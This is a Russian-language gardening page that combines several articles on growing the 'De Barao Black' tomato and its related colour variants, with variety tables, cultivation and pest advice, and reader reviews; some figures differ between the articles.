0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Томат де барао черный отзывы описание сорта фото характеристика

Томат Де Барао черный: характеристика и фото сорта, урожайность, отзывы

С каждым годом все больше огородников интересуются необычными сортами, даже заядлые консерваторы с интересом пробуют выращивать экзотические помидоры. Ведь такое диво редко можно купить в магазине или на рынке. Сорт «Де Барао Черный» выведен в Бразилии и уже достаточно давно, государственную регистрацию получил в 1997 году.

Описание

Кустики не штамбового образца, индетерминантные в высоту могут быть от 240 до 300 сантиметров. Относится к среднепоздним сортам, поспевает приблизительно через 115-130 дней после появления всходов. Имеет устойчивость к большинству заболеваний, которым подвержены томаты.

Рекомендовано выращивание в высоких теплицах, но на юге можно высаживать в открытый грунт, оберегая растения от ветра, который способен поломать растение. Отличительной особенностью является прекрасный урожай до 8 кг с одного растения, хотя в среднем урожайность составляет 6-7 килограмм. Обычно на 1 квадратном метре сажают 2 кустика, то есть с 1 м2 можно собрать 15-16 кг. «Де Барао Черный» можно хранить и транспортировать.

Помидоры небольшого размера весом 40-70 грамм, имеют округлую форму. На стадии технической зрелости зеленые, при полном созревании окрашиваются темно фиолетовый цвет. Кожица тонкая, мякоть плотная, на вкус сладкая, помидоры оснащены 2-3 камерами. В них содержится до 6% сухих веществ. В основном этот сорт едят в свежем виде, так как он обладает отменным вкусом и придаст любому салату праздничный вид. Также помидоры пригодны для засолки и консервации, из них можно готовить сок и пасту, но редко кто их для этого использует.

Достоинства

  • Экзотический вид.
  • Изумительный вкус.
  • Урожайность.
  • Стойкий иммунитет.
  • Универсальность применения.

Недостатки

  • Высокие растения, лишают возможности многих огородников выращивать их в своей теплице.
  • В регионах с переменчивым климатом плоды могут полностью не вызреть.
  • Регулярная подвязка и удаление побегов.

Заболевания и вредители

Устойчивость к болезням не дает гарантии полного их отсутствия. Сорт может подвергаться черной пятнистости, для лечения используют «Фитолавин». Еще одна напасть это вершинная гниль плодов, с ней поможет бороться раствор кальциевой селитры, также при этом заболевании ограничивают полив.

Колорадский жук собирается вручную, затем кустики обрабатываются препаратом под названием «Престиж». Со слизнями поможет справиться горчичный порошок, разведенный в воде, на 10 литров понадобится 1 столовая ложка.

Выращивание рассады

Купленный в специализированном магазине посевной материал не нуждается в обеззараживании. Если же семена собраны собственноручно с урожая, их необходимо обработать раствором марганца или медного купороса. Перед посадкой опытные огородники советуют замачивать семена в стимуляторе.

Также необходимо ответственно подойти к почве для рассады, она должна быть питательной, рыхлой и хорошо поглощать влагу. Сеять семена можно как в общую тару, чтобы избежать пикировки, так и в общую, но при появлении нескольких листков саженцы нужно будет рассадить. Перед посадкой грунт увлажняют, после того как семена посеяны, контейнеры можно накрыть прозрачной пленкой, открывают их после того как появятся всходы.

Томаты требовательны к свету, поэтому молодые саженцы размещают на солнечном месте, подойдет подоконник. На протяжении роста рассаду поливают 1-2 раза в неделю, перед высадкой в грунт закаливают, вынося на улицу, начинают с нескольких минут на свежем воздухе, с каждым днем время увеличивают.

Высадка в грунт

Перед переносом саженцев на постоянное место нужно убедиться, что заморозки миновали, и почва достаточно прогрелась. На одном квадратном метре размещают 2-3 растения. Конечно же, как и все высокорослые томаты, кустики нуждаются в подвязке, для этого следует соорудить шпалеру.

По мере роста, растения формируют в 1-2 стебля, затем на протяжении сезона каждую неделю нужно удалять пасынки, оставляя небольшой пенек, делать это лучше руками, садовые инструменты могут переносить инфекции. Поливать «Де Барао Черный» можно пару раз в неделю, лучше в прохладное время суток. Хотя бы раз в две недели рекомендовано окучивать кустики после полива, это способствует укреплению корней растения.

Удобрять следует не менее трех раз за сезон, чередуя минеральные и органические удобрения. Когда плоды полностью сформируются и нальются, листья под кистью можно удалять, так растение не будет тратить лишние силы. В момент цветения томаты обрабатывают раствором борной кислоты, растворяя 1 грамм вещества в 10 литрах воды.

Сбор урожая

Сорт отличается длительным плодоношением, собирать урожай начинают в июне, а заканчивают в сентябре. Если на улице похолодало, а на кусте остались недозрелые помидоры и срывают и отправляют дозревать на подоконник.

Заключение

Сорт больше подойдет для опытных огородников, так как они знают многие нюансы по уходу за высокорослыми сортами. Определенно помидоры очаруют своим прекрасным вкусом и необычным цветом любого.

Отзывы

Всегда мечтала вырастить необычный сорт помидор, один раз пыталась, но так ничего и не вышло. А в том году соседка поделилась семенами «Де Барао Черный» посеяла я их в марте, рассада выросла отличная, пересадила на грядку в конце мая. Очень высокорослый сорт в условиях открытого грунта растения выросли 2,5 метра. Урожайность отличная, помидоры очень вкусные. С урожая собрала семена на следующий год.

Прекрасный сорт, устойчив к фитофторе и многим другим болезням. Единственный недостаток, «Де Барао Черный» очень требователен к подкормкам, если не удобрять кустики, высоких показателей урожая не видать. Последние помидоры срывала в конце сентября перед заморозками, хранила до середины декабря, при желании можно хранить до нового года, но мы съели быстрее очень они вкусные.

Томат «Де Барао черный»: описание сорта, фото и отзывы

В данной статье мы расскажем о характеристиках томата «Де Барао черный» и специфике возделывания этого сорта.

Помидоры «Де Барао» культивируются в нашей стране уже не один десяток лет, но и сегодня они занимают видное место на российских огородах. Дачники ценят эти растения за неприхотливость, высокую урожайность и прекрасные потребительские качества плодов. В линейку входит пять сортов «Де Барао», зарегистрированных в Государственном реестре: «красный», «золотой», «оранжевый», «розовый» и «черный». Различаются они окраской и формой плодов. Кроме того, в продаже встречается посевной материал других разновидностей – «желтый», «царский», «гигант», «малиновый» и даже «черный полосатый». Не исключено, что некоторые из них в ближайшее время будут признаны официально.

Начнем с перечня основных характеристик сорта:

Параметр Характеристика
Культура Томат (Solanum lycopersicum L. var. lycopersicum)
Срок созревания Позднеспелый
Период от всходов до плодоношения 120-130 дней
Товарная урожайность До 8 кг/м2
Масса плода 50-60 г
Форма Яйцевидная, гладкая
Окраска зрелых плодов Фиолетово-коричневая
Кожица Прочная, не склонная к растрескиванию
Мякоть Плотная, ароматная
Число гнезд 2-3
Вкусовые качества Хорошие
Транспортабельность и лежкость Высокие
Назначение Салатное, консервное (пригоден для цельноплодного консервирования)
Тип растения Индетерминантное, высокорослое (до 200 см в теплицах)
Листья Среднего размера, темно-зеленые
Соцветие Простое; первое закладывается над 9-11-м листом, последующие – через 3 листа
Особенности выращивания Требует подвязки и формирования растений (в 1-2 стебля)
Устойчивость к заболеваниям Сорт слабовосприимчив к фитофторозу и другим основным заболевания культуры; вынослив к перепадам температур
Рекомендуемые регионы выращивания Все регионы (в необогреваемых пленочных теплицах и в открытом грунте)
Год регистрации в ФГБУ «Госсорткомиссия» 1999
Оригинатор ООО Селекционно-семеноводческая фирма «Гисок» (г. Москва)

Характеристика сорта и особенности выращивания

Сорт включен в Государственный реестр в 1999 году. Семена производят и реализуют большинство известных агрофирм («СеДеК», «Гавриш», «Аэлита» и многие другие). Томат можно выращивать во всех регионах страны в открытом грунте и летних укрытиях.

Растения развиваются по индетерминантному типу. Кусты высокие, в теплице вырастают до 200 см и более. Стебли прочные, но могут ломаться под грузом спелых плодов. Поэтому их рекомендуют подвязывать к опоре. Сорт обладает повышенной устойчивостью к основным заболеваниям томатов, в том числе, к фитофторозу.

«Де Барао черный» – томат позднего срока созревания (120-130 дней от появления полных всходов). В регионах со сложными погодными условиями сорт лучше выращивать в теплицах. Плоды выровненные, массой от 50 до 60 г, яйцевидные, темно коричневой окраски с фиолетовым оттенком. Мякоть плотная, очень приятного вкуса. Шкурка прочная, не склонная к растрескиванию. При грамотной агротехнике с квадратного метра посадки за сезон можно снять до 8 кг помидоров.

Как и большинство позднеспелых, сорт требует раннего посева. В средней полосе это рекомендуют делать примерно в середине февраля. Рассаду высаживают на постоянное место в возрасте 70-75 дней. На квадратном метре размещают не более 4 растений. Кусты формируют в 1-2 ствола, прищипывая их после появления 5-7 цветочных кистей. Сорт устойчив к колебаниям температуры, но нуждается в регулярных поливах и внесении подкормок.

Среди несомненных достоинств сорта нужно отметить:

  • неприхотливость и отсутствие проблем с возделыванием;
  • устойчивость к болезням;
  • урожайность;
  • хорошие вкусовые качества;
  • транспортабельность и лежкость плодов;
  • пригодность помидоров к цельноплодному консервированию.

Сорт вполне можно рекомендовать тем дачникам, которые пока не имеют солидного опыта выращивания помидоров. По отзывам, томат «Де Барао черный» – растение, которое неплохо переносит капризы погоды, а в защищенном грунте, при условии проведения дополнительных обработок против болезней, может плодоносить до конца сентября, что увеличивает вероятность получения богатого урожая.

Отзывы

Георгий, 42 года, Ленинградская область

Это один из моих любимых сортов. Вкусный, урожайный. Почти не болеет. Выращиваю в теплице, формирую в 2 стебля, семена сею свои.

Заметил интересную особенность: если взять пасынки от самой ранней рассады, укоренить их и высадить в теплицу, то на них первая кисть завязывается не над 9 листом, как положено сорту, а гораздо ниже, над 3-4 листом. Такие кусты вырастают не больше метра, но урожай дают на 2-3 недели раньше, чем обычные.

Ирина, 36 лет, г. Барнаул

Выращиваю в теплице несколько лет подряд по 3-4 куста разных «Де Барао» – золотой, розовый и черный. Все очень нравятся, особенно в смешанных маринадах. Вкусно и красиво, шкурки не трескаются. В свежем виде «Де Барао черный» лучше всех. Хорошо хранится, бурые плоды дозревают в помещении без потери вкуса.

Светлана, 51 год, г. Кимры

«Де Барао черный» – мой любимец. Каждый год отличный урожай. Сорт не капризный, но нужно регулярно подкармливать: кусты мощные, сильно истощают почву. При недостатке питания начинают болеть вершинной гнилью. От этой беды помогает опрыскивание кальциевой селитрой. Других проблем не было ни разу.

Марина, 39 лет, г. Нижний Новгород

Давно выращиваю этот сорт, и менять пока не собираюсь. Все нравится: плодов много, вкусные, красивые, удобные для консервации. Сажаю в теплицу, по 3 куста на метр. При регулярных поливах растут отлично. Фитофтора их не трогает, если обрывать все листья до нижней кисти. Первое время кусты вообще не формировала, но нарастало очень много зелени, а сами помидорки мельчали. Теперь формирую в 2-3 ствола и прищипываю после 7-й кисти. Урожая с десятка растений нашей семье хватает и на закатки, и поесть летом.

Видео по теме статьи

Предлагаем читателям посмотреть видеоролик по теме статьи:

Окончила МГРИ им. Орджоникидзе. По основной специальности – горный инженер-геофизик, а значит человек с аналитическим складом ума и разнообразными интересами. Имею собственный дом в деревне (соответственно, опыт огородничества, садоводства, грибоводства, а также возни с домашними животными и птицей). Фрилансер, в отношении своих обязанностей перфекционист и «зануда». Любитель хенд-мейда, создатель эксклюзивных украшений из камней и бисера. Страстный почитатель печатного слова и трепетный наблюдатель всего, что живет и дышит.

Нашли ошибку? Выделите текст мышкой и нажмите:

Считается, что некоторые овощи и фрукты (огурцы, стеблевой сельдерей, все разновидности капусты, перец, яблоки) обладают «отрицательной калорийностью», то есть при переваривании затрачивается больше калорий, чем в них содержится. На самом деле в пищеварительном процессе расходуется только 10-20% калорий, полученных с едой.

Перегной – перепревший навоз или птичий помет. Готовят его так: навоз складывают в кучу или бурт, переслаивая его опилками, торфом и огородной землей. Бурт накрывают пленкой, чтобы стабилизировать температуру и влажность (это нужно для повышения активности микроорганизмов). Удобрение «созревает» в течение 2-5 лет – в зависимости от внешних условий и состава исходного сырья. На выходе получается рыхлая однородная масса с приятным запахом свежей земли.

От сортовых помидоров можно получить «свои» семена для посева на следующий год (если сорт очень понравился). А с гибридными это делать бесполезно: семена-то получатся, но они будут нести наследственный материал не того растения, с которого взяты, а его многочисленных «предков».

Никакой природной защиты у томатов от фитофтороза нет. Если фитофтора нападает, гибнут любые помидоры (и картошка тоже), что бы ни было сказано в описании сортов («сорта, устойчивые к фитофторозу» – лишь маркетинговый ход).

Один из самых удобных методов заготовить выращенный урожай овощей, фруктов и ягод – заморозка. Некоторые полагают, что замораживание приводит к потере питательных и полезных свойств растительных продуктов. В результате проведенных исследований ученые выяснили, что снижение пищевой ценности при заморозке практически отсутствует.

В помощь садоводам и огородникам разработаны удобные приложения для Android. В первую очередь это посевные (лунные, цветочные и т. д.) календари, тематические журналы, подборки полезных советов. С их помощью можно выбрать день, благоприятный для посадки каждого вида растений, определить сроки их созревания и вовремя собрать урожай.

«Морозостойкие» сорта садовой земляники (чаще просто – «клубника») так же нуждаются в укрытии, как и обычные сорта (особенно в тех регионах, где бывают бесснежные зимы или морозы, чередующиеся с оттепелями). У всей земляники корни поверхностные. Это означает, что без укрытия они вымерзают. Уверения продавцов в том, что земляника «морозостойкая», «зимостойкая», «переносит морозы до −35 ℃» и т. д. – обман. Садоводы должны помнить о том, что корневую систему земляники еще никому не удавалось изменить.

Родина перца – Америка, но основные селекционные работы по выведению сладких сортов проводились, в частности, Ференцем Хорватом (Венгрия) в 20-х гг. XX века в Европе, преимущественно на Балканах. В Россию перец попал уже из Болгарии, потому и получил свое привычное название – «болгарский».

Компост – перепревшие органические остатки самого разного происхождения. Как сделать? В кучу, яму или большой ящик складывают все подряд: кухонные остатки, ботву огородных культур, скошенные до цветения сорняки, тонкие веточки. Все это переслаивают фосфоритной мукой, иногда соломой, землей или торфом. (Некоторые дачники добавляют специальные ускорители компостирования.) Накрывают пленкой. В процессе перепревания кучу периодически ворошат или протыкают для притока свежего воздуха. Обычно компост «зреет» 2 года, но с современными добавками может быть готов и за один летний сезон.

Томат Де Барао: характеристика и описание сорта

Яркими разноцветными фонариками созревающих на высоких томатах сорта Де Барао можно любоваться бесконечно. Они растут на кустах до самых заморозков. Создали томат Де Барао бразильские селекционеры. В Россию помидоры попали в конце прошлого столетия из Бразилии и сразу понравились огородникам.

Общая информация

Сорт внесен в Государственный реестр, зарегистрированы практически все его разновидности:

  • Золотой и Оранжевый;
  • Розовый и Красный;
  • Черный, Царский и Гигант;
  • Малиновый и Черный полосатый.

Разница не только в названиях томата, но и во вкусе, структуре мякоти, форме. Но объединяет все подвиды неприхотливость выращивания, устойчивый урожай, универсальность использования плодов.

Кусты томата Де Барао мощные, относятся к индетерминантным сортам. Урожайность у всех подвидов стабильная, один квадратный метр при соблюдении агротехники дает до 20 кг плодов при любых погодных условиях.

Госреестр рекомендует томаты для выращивания на частных участках и в промышленных масштабах. Можно культивировать сорт в открытом и защищенном грунте.

Высота кустов от 2 до 3 метров. Листья крупные. Соцветия с большим количеством завязей, плодоножка с сочленениями.

Чтобы понять, что собой представляют томаты Де Барао, нужно знать характеристику и описание сорта в зависимости от вида.

Разновидности сорта

Как уже было отмечено, сорт томатов Де Барао имеет несколько подвидов.

Черный

Описание

Сорт помидор Де Барао индетерминантный, среднеспелый, техническая спелость наступает через 120-130 дней с момента всходов. Рост неограниченный, в теплице может быть около трех метров.

Соцветия представлены простыми кистями с 8-10 плодами в форме овала или яйца. Камер немного, не более трех. В технической спелости плоды красновато-коричневые, как на фото ниже.

Масса отдельных плодов 40-80 граммов. Томат Де Барао Черный, по отзывам огородников, отличается плотной сладковатой мякотью. Благодаря твердой кожице отлично транспортируются и хранятся долго.

Плюсы и минусы вида

Согласно характеристике томата Де Барао Черный можно выделить следующие положительные моменты:

  • высокую урожайность;
  • интересный внешний вид;
  • отличный вкус;
  • универсальность применения;
  • транспортабельность и лежкость;
  • устойчивость к фитофторе.

Если говорить о недостатках, то это:

  • поражение плодов черной бактериальной пятнистостью и вершинной гнилью;
  • неспособность растения сопротивляться колорадскому жуку, слизням.

Кроме просто Черного Де Барао, есть еще Де Барао Черный Полосатый, вот он на фото ниже.

Красный

Еще одна из разновидностей – сорт помидор Де Барао Красный созревает через 120-130 дней. Он индетерминант, высотой до 3 м. Именно поэтому помидоры советуют выращивать в теплице, чтобы избежать травмирования куста ветрами.

Томат Де Барао Красный урожайный сорт, отзывы огородников и фото ниже это подтверждают. Один куст при правильном уходе подарит около 6 кг вкусных и плотных плодов яйцевидной формы.

В технической спелости томаты ярко-красного цвета, масса отдельных помидоров от 80 до 120 граммов. Плоды сорта Де Барао Красный по отзывам огородников и описанию двух- или трехкамерные. Сухого вещества в них 5-6%.

Если говорить о применении, то кроме использования в свежем виде, плоды томата Де Барао Красный (учитывая описание) чаще всего консервируют целиком: позволяют размеры и плотная кожица, которая не лопается ни на кустах, ни при заливке кипятком.

Достоинства

  • привлекательные внешние данные;
  • холодостойкость и выносливость;
  • отличные вкусовые свойства;
  • высокая транспортабельность;
  • долгий срок хранения;
  • универсальность использования;
  • стойкость ко многим болезням и вредителям пасленовых культур;
  • отличная урожайность.

Недостатки

  1. Невозможность выращивания в открытом грунте в зоне рискованного земледелия из-за среднепоздних сроков созревания. Теплицы должны быть достаточно высокими.
  2. Трудности в формировании: только в один или два стебля, все остальные пасынки, а также листья нужно постоянно удалять.
  3. Желательно сажать томаты Де Барао отдельно от других сортов.

Розовый

Растение относится, как и все разновидности Де Барао к индетерминантным, высокорослым (выше 2 метров), сортам с кистевым типом плодоношения. Техническая спелость наступает через 115-125 дней от посадки. Томаты предназначены для выращивания в теплице.

Междоузлия у помидор Де Барао Розовый большие, стебли сильные и мощные. Листья обычные, темно-зеленого цвета. Соцветия простые, компактной структуры. Первое из них появляется достаточно высоко, над 9 или 11 листом. Следующие кисточки с шагом через три листа.

Плоды небольшие, массой от 50 до 70 граммов, в форме сливки. Поверхность гладкая, кожица плотная, поэтому растрескивания не наблюдается. Вкус обычный помидорный. В технической зрелости томат Де Барао Розовый по отзывам и фото, ярко-розовый. Плоды универсального назначения. Растения устойчивы к помидорным болезням.

Царский

Помидоры данного сорта среднеспелые (120-125 дней), высокорослые (до двух метров). Формируют томат Де Барао Царский, судя по описанию, в 1-2 стебля, он нуждается в опоре, подвязывании, пасынковании.

Тип соцветия – кистевой, с плодами, напоминающими сливки с небольшой пипочкой. Плоды нежно-розового цвета, с едва заметной золотой короной у цветоножки.

У плодов ярко выраженный томатный вкус. Вес помидоров 50-100 граммов. Плодоношение растянутое, урожай собирают до самых заморозков. Томат Де Барао Царский устойчив к болезным.

Золотой

Данный сорт – результат любительской селекции. Растение позднеспелое, индетерминантное, что значит, не ограничивает себя в росте. Выращивать можно только в защищенном грунте.

Кусты мощные с большим количеством темно-зеленых листьев и пасынков. Это усложняет уход, поскольку требуется постоянно пасынковать томаты. Специалисты и огородники советуют оставлять только один стебель.

Плоды томата Де Барао Золотой, по отзывам, имеют овальную сливовидную форму. Поверхность гладкая. Вес томатов от 79 до 90 граммов. Вкус отличный. В технической спелости плоды золотисто-лимонного цвета.

Сорт урожайный, с одного куста при правильной агротехнике собирают до 6,5 кг плодов. Это достигается еще и за счет устойчивости томата к заболеваниям пасленовых культур. Как отмечают в отзывах огородники, томат Де Барао Золотой практически не заболевает фитофторозом.

Плоды желтого цвета очень полезны. Диетологи отмечают, что они не вызывают аллергии, способны снизить давление, уровень холестерина. В них содержатся необходимые человеку калий, железо, магний, кобальт и цинк.

Оранжевый

Данный сорт ввели в Государственный реестр только в 1999 году. Несмотря на короткий срок выращивания, томат Де Барао Оранжевый уже успел полюбиться российским огородникам. Сорт индетерминантного типа, мощный, позднеспелый. Единственное на что обращают внимание оригинаторы, помидоры не успевают вызреть в открытом грунте, рекомендуется выращивать только в теплицах.

Листьев не слишком много, они насыщенного зеленого цвета. Строение обычное, как и у всех разновидностей сорта.

Плоды средних размеров, яйцевидные, масса в пределах 65 граммов, с двумя или тремя камерами. Мякоть плотная, сочная. На каждой кисточке образуется до 8-10 ярких оранжевых плодов с приятным вкусом. Согласно описанию (это видно и на фото), томаты выровненные по массе и по форме.

Томаты транспортабельные, с большим сроком хранения. Назначение плодов универсальное: в свежем виде, для цельноплодного консервирования, салатов, приготовления сока.

Урожайность высокая (до 8 кг с одного растения), если выращивать кусты в один стебель. Растения почти не болеют фитофторой, даже если лето дождливое.

Гигант

Описание

Помидоры Де Барао Гигант отличаются мощностью, высоким до 2 метров ростом. Растения холодостойкие, теневыносливые. Рекомендованы для выращивания в защищенном грунте. Техническая спелость наступает через 125-130 дней.

Растение кистевого типа, на каждой кисти завязывается в среднем 6-7 плодов, иногда и больше. Средний вес от 70 до 100 граммов. Форма плода – сливка. Мякоть плотная с двумя-тремя камерами. Спелые плоды красного цвета, а шапочка, в районе цветоножки зеленоватая.

Преимущества сорта

О томате Гигант отзывы в основном восторженные. Главными достоинствами огородники называют:

  1. Стабильную урожайность.
  2. Отличный вкус.
  3. Универсальность применения.
  4. Долгий срок хранения и транспортабельность.
  5. Высокую стойкость к заболеваниям пасленовых культур.

Заключение

Разновидностей томата Де Барао немало. Это радует огородников, которым нравится экспериментировать на своих участках. Часть из них мы постарались коротко описать. На фото ниже показан еще один интересный сорт из этой же серии Де Барао Малиновый.

Важно заметить, что все подвиды урожайные, вкусные. Сорт можно выращивать в любых регионах России, но лучшие результаты получаются в теплицах. Главное, соблюдать агротехнику, принятую для индетерминантных сортов.

Описание томата Де Барао Черного

Сорт томатов Де Барао черный потихоньку заполняет рынки наших городов. Экзотический на вид плод выгодно сочетает в себе пестроту цвета и гармонию вкуса.

Описание томата Де Барао Черного

Описание вида помидор

Известно несколько видов сорта Де Барао: Чёрный, Розовый, Королевский, Красный, Золотой. Все они отличаются по структуре и вкусовым качествам. Де Барао черного цвета прекрасно подойдет для употребления в пищу в сыром виде и для консервации. Особенностью ваших припасов, приготовленных на зиму, будут консервированные помидоры, одинаковой формы и необычного цвета. Вы станете самой яркой хозяйкой любого застолья.

По отзывам фермеров, выращивающих столь необычный вид помидор, можно составить такое описание. Сорт Де Барао черный отлично подходит для выращивания в южной части страны, где климат теплый, умеренный. Заниматься рассадой такого рода помидорин возможно, как в тепличных условиях, так и путем высадки в грунт.

В некоторых случаях, предпочтительнее выращивать Де Барао в высоких теплицах. Причина тому, как рассказывает описание сорта, в его индертерминантности, что означает непрерывность роста.

Вследствие интенсивного развития, ветки кустов могут ломаться от ветра, что будет влиять на урожайность. Для этого опытные селекционеры подвязывают высокий ствол томата, делают загородки от ветра либо выращивают такие помидоры только в теплице.

Отличительные черты вида

  • растение не штамбовое;
  • рост достигает более двух метров;
  • индертерминантность кустов;
  • большая урожайность;
  • форма плодов продолговато-округлая;
  • вес зрелых помидорин достигает до 70 грамм;
  • имеет до трех камер;
  • сухая часть до шести процентов.

Общая характеристика плодов говорит о их утонченности и принадлежности к ряду экстравагантных культур. Изысканность цвета варьируется от темного фиолетового до насыщенного черного.

Плоды, обладающие столь выдающимися вкусовыми качествами, станут украшением любого стола. Если же вы растите ягоды с целью продажи, будьте уверены в прибыльности дела. Каждый человек захочет вкусить новинку.

Особенности выращивания

Томат Де Барао черный – теплолюбив, поэтому для его выращивания подойдут более жаркие регионы страны. Сорт помидорин был выведен бразильскими селекционерами, отсюда и название Де Барао. Если вы не знаете, как привлечь покупателей или просто надоели однообразные томаты – этот сорт станет открытием для вас и ваших близких. Ссылаясь на многочисленные отзывы, можно уверенно сказать, что фермеры со всех округ очень довольны культурой. Выращивание такого вида помидор ничем не отличается от посадки обыкновенных сортов.

Томат очень теплолюбив

Перед посадкой следует удобрить землю перегноем. Каждое семя отдельно кладем на разрыхленную почву и засыпаем тоненьким слоем землицы. Поливаем только, что высеянные семена, затем накрываем пленкой. Дождавшись росточков, отсаживаем те, которые имеют по 2 или 3 листочка, в горшки. Несколько раз в месяц – сдабривайте рассаду жидкими удобрениями. Сорт Де Барао черного цвета следует высаживать ранней весной, тогда вы успеете получить свой урожай к лету. Время на полное созревание помидор от 120 дней, именно за это его можно назвать позднеспелым.

Высадку в грунт нужно производить только, убедившись в состоятельности куста. Обязательно подготовьте ростки к перепаду температур, для этого следует постепенно закаливать растение. Высаживать плодовый кустарник в почву с таким расчетом – два ростка на квадратный метр. Для уверенности в правильности своих действий и наглядного пособия по выращиванию помидор, можно просмотреть видео, на котором воочию возможно увидеть весь процесс от высадки до сбора урожая. Также в этом плане помогут и фото, по которым наглядно видно, какого результата вы должны ожидать. Урожайность растений напрямую зависит от:

  • условий роста;
  • правильности ухода;
  • климатических условий.

Достоинства и недостатки

Достоинства

Главным достоинством черного томата является его уникальный сладковатый вкус и маленький размер плода, что позволяет сполна насладиться помидоркой. Одним из плюсов такого гибрида есть его внешний вид, который позволяет рентабельно продать экзотические на вид помидорины.

Черным помидорам свойственна выносливость и неприхотливость, достаточно полива и небольшого удобрения почвы, и вам обеспечен богатый урожай. С метра квадратного можно собрать до 16 килограмм. Культура устойчива к резкой смене температуры, и имеет хороший, стойкий иммунитет против болезней.

Недостатки

Минусов у сорта не так и много, в основном, они связаны с климатическими условиями. В холодных, северных регионах плоды попросту могут не доспеть, из-из нехватки солнца вкус помидорин будет кислым.

Высаживать такие томаты следует на отдельном участке, по причине плохого уживания с другими сортами. Высота растения также становится помехой к выращиванию. Для такого высокого растения требуется своеобразная теплица. Также сорт не подойдет для человека, не желающего слишком заморачиваться над уходом за плодами, которые требуют постоянной обрезки.

Борьба с жуками

Даже при том, что сорт мало подвержен болезням, стоит делать профилактику. Сделать , современный раствор не составит большого труда. Проводить профилактические процедуры раз в два месяца. Тогда ваш урожай будет богатым и здоровым.

Томат Де Барао черный

Сорт помидоров де Барао попал к нам из далекой Бразилии еще в середине 90-их. Быстрыми темпами распространился по всей территории страны: от южных, центральных регионов, Подмосковья и до Урала. Удостоился уважения и хороших отзывов огородников и фермеров. Уже через несколько лет, в 1997 году, томат де Барао был внесен в Государственный реестр, как сорт, предназначенный для выращивания в теплице.

Спустя 20 лет селекционеры вывели несколько разновидностей де Барао, которые поражают воображение и радуют глаз своей яркостью и разнообразием. Хорошо известны и официально зарегистрированы красные, розовые, оранжевые, золотые, черные томаты. Хорошо приживаются и новые виды: желтые, малиновые, царские, тигровые гиганты.

Одним из ярких представителей данного сорта является помидор де Барао черный. Его положительные качества заслуживают детального описания.

Характеристики и описание томата

Само название сорта de Barao black переводится как «черный барон», указывает на его основную особенность – экзотическую окраску. Цвет плодов шоколадный с темно-вишневым или фиолетовым оттенком.

Основные характеристики помидора Дебарау черный:

  • Позднеспелый сорт – дозревание плодов происходит приблизительно за 120 дней с момента прорастания рассады;
  • Растение не штамбовое, индетерминантное – характеризуется неограниченным ростом. В комфортных условиях куст может достигать гигантских размеров – больше трех метров;
  • Предназначен для выращивания в тепличных условиях, но при хороших климатических условиях вполне может расти и на открытом грунте;
  • Требует пасынкования и прищипывания;
  • Высокая урожайность – при условии пристального ухода достигает 8 кг с одного куста;
  • Хорошая стойкость к вредителям и заболеваниям;
  • Правильное развитие, как на солнечном, так и в затененном месте;
  • Насыщенный томатный вкус со сладковатым оттенком;
  • Приспособленный к перевозкам и долгому хранению.

Описание томата Дебарау черный:

  • Кусты высокие (3-3.5 м);
  • Листья темно-зеленой окраски, средних размеров;
  • Соцветие простое, формируется при наличии 9-10 листков. На одной кисти развивается около 10 помидор;
  • Плоды темно-вишневые, коричневые; средних размеров – 50-60 г., яйцевидной формы (сливки), гладкие;
  • Кожица плотная, не растрескивается, томат поделен на 2-3 камеры;
  • Мякоть мясистая, сочная, содержание сухих веществ достигает 6%.

Благодаря необычайному цвету и томатному вкусу, де Бордо черный томат имеет универсальное применение. Его используют в сыром, вяленом, тушеном виде, замораживают, делают разнообразные салаты и соусы. Приятная сладость нравится детям, а своим небольшим размером и плотной кожей помидор отлично подходит для консервирования и соления. Наверное, единственное, для чего плод используют редко, – производство томатного сока. Из-за мясистой мякоти выход сока имеет небольшое количество.

Еще одна положительная особенность сорта томат Дебарау черный – собирать помидоры можно в состоянии технической зрелости (не совсем спелые). Постепенно они дозреют самостоятельно. Это особенно ценится при дальних перевозках.

Агротехника и особенности выращивания

Процесс выращивания и ухода за томатами де Барао можно условно разделить на несколько этапов:

  • Посев семян;
  • Пикирование рассады;
  • Высадка кустов;
  • Уход за помидорами;
  • Борьба с вредителями и болезнями.

Посев семян

Посев и выращивание рассады – одни из главных этапов в процессе роста томатов. От качества пагонов в большей степени зависит будущий урожай. Проводят посев в марте (желательно до середины месяца).

Важно. Первое, что нужно сделать для посева семян, – подготовить емкости с почвой. Выбираются не слишком глубокие, желательно, деревянные ящики. На дно высыпается шар керамзита или песка, он будет служить дренажом. Сверху выкладывается почва. Ее можно подготовить самому (смесь хорошего дернового грунта, песка и перегноя) или приобрести готовую торфяную почву (подойдут также таблетки из торфа).

Следующий этап – подготовка семян. Если выбранные семена покрыты специальной цветной оболочкой, их можно сразу высевать – они уже прошли обработку, а покрытие включает в себя комплекс веществ, нужных для хорошего роста. Если же семена не обработаны, их стоит поместить на несколько часов в слабый раствор марганцовки. Это действие ускоряет процесс прорастания и снижает риск заболевания пагонов.

В слегка увлажненной почве делаются неглубокие канавки на расстоянии 4-5 см. Высеваются семена, слега прикрываются и утрамбовываются. Сверху покрываются пленкой (можно стеклом) для получения парникового эффекта. При появлении первых всходов пленку нужно снять. Полив рассады проводится путем опрыскивания.

Пикирование рассады

В период появления 4-х листиков можно приступать к процессу пересадки пагонов в отдельные емкости. Для правильного дальнейшего роста помидоров нужно уделить внимание условиям их выращивания:

  • Хорошее освещение;
  • Стабильная температура (около 20 градусов);
  • Своевременное опрыскивание;
  • Хорошее проветривание.

По мере роста рассады начинается закалка помидоров – кустики выносятся на свежий воздух.

Высадка рассады

Когда высота рассады достигает 30 см, и ее корневая система хорошо развита, можно приступить к высадке рассады на грядку.

Важно! Высаживать кусты томата на грядку можно в середине или конце мая. Но при условии, что температура воздуха не падает ниже 15 градусов тепла, и риск заморозков минимален.

При выборе места посадки нужно учитывать, то помидоры хорошо растут после капусты, огурцов, лука, свеклы. Не рекомендуется сажать кусты на месте картофеля или баклажанов. Кроме того, не следует высаживать помидоры на одном и том самом месте два сезона подряд, нужно делать перерыв.

Еще одна особенность томата де Барао – он хорошо растет и в открытом грунте. Но, благодаря своему высокому росту, нуждается в опоре. Именно по этой причине данный сорт помидоров лучше высаживать в теплице или вдоль стен дома. Если принято решение сажать в открытый грунт, нужно позаботиться о подпорке.

Обратите внимание! Кусты и плоды томатов плохо воспринимают прямые солнечные лучи и попадание дождя – листья чернеют, плоды растрескиваются.

